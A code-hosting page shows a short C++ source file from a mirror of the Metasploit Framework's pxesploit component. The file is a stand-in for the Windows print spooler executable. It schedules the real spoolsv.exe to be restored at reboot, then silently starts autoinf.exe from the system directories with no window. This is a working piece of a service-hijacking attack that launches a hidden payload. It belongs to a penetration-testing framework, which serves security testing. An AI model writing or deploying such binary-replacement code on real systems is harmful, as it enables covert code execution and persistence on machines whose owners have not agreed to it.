infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/external/source/pxesploit/spoolsv/spoolsv.cpp

22 lines
773 B
C++
Raw Blame History

#include <Windows.h>
void start(){
//Set up move back just in case
MoveFileExA("C:\\Windows\\System32\\spoolsv.bak.exe","C:\\Windows\\System32\\spoolsv.exe",
MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT);
//start replacement proc
char windowsPath[MAX_PATH];
GetWindowsDirectoryA(windowsPath,MAX_PATH);
SetCurrentDirectoryA(windowsPath);
STARTUPINFOA strt;
PROCESS_INFORMATION proci;
for(int i = 0; i < sizeof(strt); i++)
((char*)&strt)[i]=0;
for(int i = 0; i < sizeof(proci); i++)
((char*)&proci)[i]=0;
//one of these will work
if(CreateProcessA("System32\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0)
CreateProcessA("SysWOW64\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
}
Reference in New Issue View Git Blame Copy Permalink